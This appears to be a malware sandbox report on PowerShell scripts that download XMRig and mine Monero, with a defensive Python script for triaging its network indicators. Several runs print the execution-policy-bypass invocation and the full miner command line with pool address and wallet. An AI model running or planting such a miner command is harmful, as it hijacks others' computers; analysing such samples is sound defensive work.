memory/332-118-0x00007FF711A50000-0x00007FF712683000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:48
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4180 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4180 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
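The Network tables of the behavioral runs mix three kinds of rows: the forward DNS queries and TCP sessions the sample actually drove (github.com and objects.githubusercontent.com, consistent with fetching the dropped xmrig release, then gulf.moneroocean.stream on port 10128), reverse lookups of addresses that were already seen (the `*.in-addr.arpa` rows, which are not indicators in their own right), and one direct-to-IP row with no name at all. The following is an added example, not part of the report: it parses rows in the table's own layout, tolerates the shifted `| NL | ip:port | tcp | |` row, and sorts the rows into lookups, noise, staging, pool and review buckets so that only the pool endpoint ends up on a block list. The sample rows are copied from the tables above; the benign-host suffix list and the pool-name fragments are assumptions made for the example.

```python
from __future__ import annotations

# Constructed subset of the report's Network tables, in the same row layout
# (including the shifted last row exactly as the page shows it).
SAMPLE_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
"""

# Assumptions for the example: hosts the payload was staged on, and name fragments
# that mark public Monero pools. Both lists need maintenance in real use.
BENIGN_SUFFIXES = ("github.com", "githubusercontent.com", "bing.com", "bing.net")
MINING_HINTS = ("moneroocean", "pool", "xmr", "hashvault", "nanopool", "2miners")
STANDARD_PORTS = {53, 80, 443}


def parse_rows(table: str) -> list[dict]:
    """Split a markdown network table into dicts; skip the header row."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        # Shifted row ("| NL | ip:port | tcp | |"): the protocol landed in the Domain column.
        if proto == "" and domain.lower() in ("tcp", "udp"):
            domain, proto = "", domain
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port), "dest": dest,
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def triage(table: str) -> dict[str, list]:
    """Bucket each row by what it tells the analyst."""
    out = {"lookups": [], "noise": [], "staging": [], "pool": [], "review": []}
    for r in parse_rows(table):
        if r["domain"].endswith(".in-addr.arpa"):
            out["noise"].append(r["domain"])           # PTR lookups of addresses already seen
        elif r["proto"] == "udp" and r["port"] == 53:
            out["lookups"].append(r["domain"])         # forward DNS: names the sample resolved
        elif not r["domain"]:
            out["review"].append((r["dest"], ""))      # direct-to-IP, attribute by hand
        elif r["domain"].endswith(BENIGN_SUFFIXES):
            out["staging"].append((r["dest"], r["domain"]))  # public host used to fetch the payload
        elif any(h in r["domain"] for h in MINING_HINTS) or r["port"] not in STANDARD_PORTS:
            out["pool"].append((r["dest"], r["domain"]))
        else:
            out["review"].append((r["dest"], r["domain"]))
    return out


def block_list(table: str) -> set[str]:
    """Indicators safe to block outright: the pool endpoint(s), by name and by ip:port."""
    iocs = set()
    for dest, domain in triage(table)["pool"]:
        iocs.add(dest)
        if domain:
            iocs.add(domain)
    return iocs


if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_TABLE).items():
        print(f"{bucket:8} {items}")
    print("block:", sorted(block_list(SAMPLE_TABLE)))
```

Blocking github.com or the githubusercontent CDN would break far more than this sample, which is why the staging rows are reported but kept off the block list; the durable network indicator is the pool name plus its non-standard port, and the `review` bucket is where the unattributed 52.142.223.178:80 session waits for a human decision rather than being silently promoted to an IOC.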
Files
memory/4180-4-0x00007FF921E13000-0x00007FF921E14000-memory.dmp
memory/4180-5-0x0000021D44F30000-0x0000021D44F52000-memory.dmp
memory/4180-7-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-10-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-11-0x0000021D5DFF0000-0x0000021D5E066000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ugftiv1w.0ta.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4180-27-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-51-0x0000021D44FF0000-0x0000021D45002000-memory.dmp
memory/4180-64-0x0000021D44FD0000-0x0000021D44FDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:51
Platform
win10v2004-20240508-en
Max time kernel
1741s
Max time network
1750s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.229.43:443 | | tcp |
Files
memory/1332-0-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdjxuohe.awq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3888 wrote to memory of 3644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3888 wrote to memory of 3644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3888-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_naa4ngm4.1hx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:55
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4540 wrote to memory of 3476 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4540 wrote to memory of 3476 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bx2abgun.4f1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4540-25-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-48-0x000001F4F1740000-0x000001F4F1752000-memory.dmp
memory/4540-61-0x000001F4F1720000-0x000001F4F172A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:58
Platform
win7-20231129-en
Max time kernel
1565s
Max time network
1566s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win11-20240611-en
Max time kernel
1798s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3092 wrote to memory of 240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fx33gqzl.qeq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win7-20240508-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win10-20240611-en
Max time kernel
1797s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 520 wrote to memory of 800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 520 wrote to memory of 800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ln4pwkgv.jyx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
